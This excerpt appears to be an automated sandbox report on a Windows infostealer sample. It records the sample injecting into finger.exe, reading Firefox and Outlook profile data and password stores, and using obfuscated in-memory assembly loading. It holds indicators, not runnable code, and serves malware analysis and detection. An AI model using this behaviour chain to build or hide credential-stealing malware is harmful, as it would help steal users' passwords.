                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_03064F408_2_03064F40
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_02FF0E598_2_02FF0E59
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_0306EFA08_2_0306EFA0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_02FFCFE08_2_02FFCFE0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030AEE268_2_030AEE26
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_02FE2FC88_2_02FE2FC8
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_03002E908_2_03002E90
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030ACE938_2_030ACE93
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030AEEDB8_2_030AEEDB
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_02FE0CF28_2_02FE0CF2
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_0308CD1F8_2_0308CD1F
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_03008DBF8_2_03008DBF
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_02FF0C008_2_02FF0C00
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_02FEADE08_2_02FEADE0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_03090CB58_2_03090CB5
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_02FFAD008_2_02FFAD00
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030A132D8_2_030A132D
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_02FF52A08_2_02FF52A0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_0303739A8_2_0303739A
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_02FDD34C8_2_02FDD34C
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_0300B2C08_2_0300B2C0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030912ED8_2_030912ED
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_02FF70C08_2_02FF70C0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030BB16B8_2_030BB16B
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_0302516C8_2_0302516C
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_02FFB1B08_2_02FFB1B0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_02FDF1728_2_02FDF172
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_0309F0CC8_2_0309F0CC
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030A70E98_2_030A70E9
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030AF0E08_2_030AF0E0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030AF7B08_2_030AF7B0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030356308_2_03035630
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030A16CC8_2_030A16CC
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030A75718_2_030A7571
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_02FE14608_2_02FE1460
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_0308D5B08_2_0308D5B0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030AF43F8_2_030AF43F
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030AFB768_2_030AFB76
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_0300FB808_2_0300FB80
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_03065BF08_2_03065BF0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_0302DBF98_2_0302DBF9
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030AFA498_2_030AFA49
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030A7A468_2_030A7A46
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_03063A6C8_2_03063A6C
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_03035AA08_2_03035AA0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_0308DAAC8_2_0308DAAC
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_03091AA38_2_03091AA3
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_0309DAC68_2_0309DAC6
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030859108_2_03085910
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_02FF38E08_2_02FF38E0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_0300B9508_2_0300B950
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_0305D8008_2_0305D800
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_02FF99508_2_02FF9950
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030AFF098_2_030AFF09
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_02FF9EB08_2_02FF9EB0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030AFFB18_2_030AFFB1
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_02FF1F928_2_02FF1F92
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030A1D5A8_2_030A1D5A
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030A7D738_2_030A7D73
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_0300FDC08_2_0300FDC0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_03069C328_2_03069C32
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_02FF3D408_2_02FF3D40
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030AFCF28_2_030AFCF2
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_00601ED08_2_00601ED0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_005FCDC08_2_005FCDC0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_005FAFF08_2_005FAFF0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_005FAFE88_2_005FAFE8
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_005FCFE08_2_005FCFE0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_005FB1408_2_005FB140
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_005FB1368_2_005FB136
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_006055608_2_00605560
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_006037708_2_00603770
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_0061BC208_2_0061BC20
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_02EDE3988_2_02EDE398
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_02EDE4B38_2_02EDE4B3
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_02EDCBAA8_2_02EDCBAA
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_02EDD8E38_2_02EDD8E3
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_02EDE84C8_2_02EDE84C
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_02EDD9188_2_02EDD918
                Source: C:\Windows\SysWOW64\finger.exeCode function: String function: 0305EA12 appears 86 times
                Source: C:\Windows\SysWOW64\finger.exeCode function: String function: 02FDB970 appears 280 times
                Source: C:\Windows\SysWOW64\finger.exeCode function: String function: 03025130 appears 58 times
                Source: C:\Windows\SysWOW64\finger.exeCode function: String function: 0306F290 appears 105 times
                Source: C:\Windows\SysWOW64\finger.exeCode function: String function: 03037E54 appears 103 times
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: String function: 0120F290 appears 105 times
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: String function: 011FEA12 appears 86 times
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: String function: 0117B970 appears 275 times
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: String function: 011D7E54 appears 101 times
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: String function: 011C5130 appears 58 times
                Source: 72STaC6BmljfbIQ.exe, 00000000.00000002.1550816063.0000000006CB0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs 72STaC6BmljfbIQ.exe
                Source: 72STaC6BmljfbIQ.exe, 00000000.00000002.1549390338.0000000005010000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs 72STaC6BmljfbIQ.exe
                Source: 72STaC6BmljfbIQ.exe, 00000000.00000002.1546553388.00000000037A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs 72STaC6BmljfbIQ.exe
                Source: 72STaC6BmljfbIQ.exe, 00000000.00000002.1544491639.00000000009DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 72STaC6BmljfbIQ.exe
                Source: 72STaC6BmljfbIQ.exe, 00000000.00000002.1545416486.00000000027E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs 72STaC6BmljfbIQ.exe
                Source: 72STaC6BmljfbIQ.exe, 00000006.00000002.1924475364.0000000000CF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefinger.exej% vs 72STaC6BmljfbIQ.exe
                Source: 72STaC6BmljfbIQ.exe, 00000006.00000002.1924816273.000000000127D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 72STaC6BmljfbIQ.exe
                Source: 72STaC6BmljfbIQ.exeBinary or memory string: OriginalFilenameIBtw.exe0 vs 72STaC6BmljfbIQ.exe
                Source: 72STaC6BmljfbIQ.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 72STaC6BmljfbIQ.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.72STaC6BmljfbIQ.exe.3876790.0.raw.unpack, d8p59esdy6IQbESTR1.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.72STaC6BmljfbIQ.exe.3876790.0.raw.unpack, d8p59esdy6IQbESTR1.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.72STaC6BmljfbIQ.exe.3876790.0.raw.unpack, d8p59esdy6IQbESTR1.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.72STaC6BmljfbIQ.exe.3876790.0.raw.unpack, JLeJ0DSZTD8q7YdFNQ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.72STaC6BmljfbIQ.exe.6cb0000.4.raw.unpack, JLeJ0DSZTD8q7YdFNQ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.72STaC6BmljfbIQ.exe.6cb0000.4.raw.unpack, d8p59esdy6IQbESTR1.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.72STaC6BmljfbIQ.exe.6cb0000.4.raw.unpack, d8p59esdy6IQbESTR1.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.72STaC6BmljfbIQ.exe.6cb0000.4.raw.unpack, d8p59esdy6IQbESTR1.csSecurity API names: _0020.AddAccessRule
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@11/2@9/8
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\72STaC6BmljfbIQ.exe.logJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeMutant created: NULL
                Source: C:\Windows\SysWOW64\finger.exeFile created: C:\Users\user\AppData\Local\Temp\40F193-3PQJump to behavior
                Source: 72STaC6BmljfbIQ.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 72STaC6BmljfbIQ.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: finger.exe, 00000008.00000002.3269614249.0000000002BD3000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000008.00000002.3269614249.0000000002C0A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: 72STaC6BmljfbIQ.exeReversingLabs: Detection: 57%
                Source: unknownProcess created: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe "C:\Users\user\Desktop\72STaC6BmljfbIQ.exe"
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeProcess created: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe "C:\Users\user\Desktop\72STaC6BmljfbIQ.exe"
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeProcess created: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe "C:\Users\user\Desktop\72STaC6BmljfbIQ.exe"
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeProcess created: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe "C:\Users\user\Desktop\72STaC6BmljfbIQ.exe"
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exeProcess created: C:\Windows\SysWOW64\finger.exe "C:\Windows\SysWOW64\finger.exe"
                Source: C:\Windows\SysWOW64\finger.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeProcess created: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe "C:\Users\user\Desktop\72STaC6BmljfbIQ.exe"Jump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeProcess created: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe "C:\Users\user\Desktop\72STaC6BmljfbIQ.exe"Jump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeProcess created: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe "C:\Users\user\Desktop\72STaC6BmljfbIQ.exe"Jump to behavior
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exeProcess created: C:\Windows\SysWOW64\finger.exe "C:\Windows\SysWOW64\finger.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\finger.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: 72STaC6BmljfbIQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: 72STaC6BmljfbIQ.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: finger.pdb source: 72STaC6BmljfbIQ.exe, 00000006.00000002.1924475364.0000000000CF8000.00000004.00000020.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 00000007.00000002.3269044593.0000000000758000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: PWhloTdOLAusO.exe, 00000007.00000002.3269332968.0000000000C2E000.00000002.00000001.01000000.0000000C.sdmp, PWhloTdOLAusO.exe, 0000000B.00000000.1996112338.0000000000C2E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: 72STaC6BmljfbIQ.exe, 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000008.00000002.3271087733.000000000314E000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000008.00000002.3271087733.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000008.00000003.1928191608.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000008.00000003.1924126889.0000000002C5C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: 72STaC6BmljfbIQ.exe, 72STaC6BmljfbIQ.exe, 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, finger.exe, finger.exe, 00000008.00000002.3271087733.000000000314E000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000008.00000002.3271087733.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000008.00000003.1928191608.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000008.00000003.1924126889.0000000002C5C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: finger.pdbGCTL source: 72STaC6BmljfbIQ.exe, 00000006.00000002.1924475364.0000000000CF8000.00000004.00000020.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 00000007.00000002.3269044593.0000000000758000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Source: 0.2.72STaC6BmljfbIQ.exe.3876790.0.raw.unpack, d8p59esdy6IQbESTR1.cs.Net Code: mbiuc0QN0pno7t6iwue System.Reflection.Assembly.Load(byte[])
                Source: 0.2.72STaC6BmljfbIQ.exe.6cb0000.4.raw.unpack, d8p59esdy6IQbESTR1.cs.Net Code: mbiuc0QN0pno7t6iwue System.Reflection.Assembly.Load(byte[])
                Source: 0.2.72STaC6BmljfbIQ.exe.5010000.3.raw.unpack, L2.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 0_2_0277EE60 push esp; iretd 0_2_0277EE61
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 0_2_04DC62F1 pushfd ; retf 0_2_04DC62F6
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 0_2_04DC0A2B push ebp; retf 0_2_04DC0A3A
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 0_2_04DC1436 push ebp; retf 0_2_04DC1446
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 0_2_04DC1310 push ebp; retf 0_2_04DC131E
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 0_2_04DC1E97 push ebp; retf 0_2_04DC1EA6
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 0_2_04DC5860 pushfd ; retf 0_2_04DC586A
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0041E877 push es; ret 6_2_0041E82F
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_00416163 pusha ; iretd 6_2_004160B8
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_00403110 push eax; ret 6_2_00403112
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0040D1E1 push edx; retf 6_2_0040D1EB
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0041427A push esp; ret 6_2_00414347
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_00414222 push esp; ret 6_2_00414347
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0040D2E0 push edi; retf 6_2_0040D2E4
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0041435B push esp; ret 6_2_00414347
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_00401D02 push ss; iretd 6_2_00401D04
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_00418D36 push ds; iretd 6_2_00418D3C
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_00414587 push edi; ret 6_2_0041459C
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_00414593 push edi; ret 6_2_0041459C
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_00416626 push eax; ret 6_2_004166A4
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_00415ED3 pusha ; iretd 6_2_004160B8
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0041177F pushfd ; ret 6_2_00411786
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0041E7E5 push es; ret 6_2_0041E82F
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_00423783 push edi; iretd 6_2_0042378E
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011809AD push ecx; mov dword ptr [esp], ecx6_2_011809B6
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_02FE09AD push ecx; mov dword ptr [esp], ecx8_2_02FE09B6
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_0060C47D push cs; ret 8_2_0060C4A1
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_0061066A push edi; iretd 8_2_0061067B
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_00610670 push edi; iretd 8_2_0061067B
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_005FE66C pushfd ; ret 8_2_005FE673
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_00602DC0 pusha ; iretd 8_2_00602FA5
                Source: 72STaC6BmljfbIQ.exeStatic PE information: section name: .text entropy: 7.812825640175082
                Source: 0.2.72STaC6BmljfbIQ.exe.3876790.0.raw.unpack, vnhkB9c5LWBYTUEP1mo.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'arHh7j6dI3', 'qVvhl4WDsT', 'SCih4RHlv6', 't1vhOvGXRe', 'ku4hR4uQXq', 'lRDhGiiJY7', 'b5lhAAYhWE'
                Source: 0.2.72STaC6BmljfbIQ.exe.3876790.0.raw.unpack, bi4fTib2k6j6UQHQKR.csHigh entropy of concatenated method names: 'LP9c2LeJ0D', 'rTDcs8q7Yd', 'kXscanMSxT', 'WDdcypJVij', 'LU8cV7JIhH', 'yVOc8pevcu', 'x12eJr68TYLjoEqxrb', 'AbBirVkG0BZXZHxhyj', 'BKQccIZZSh', 'MwvcQJPsOP'
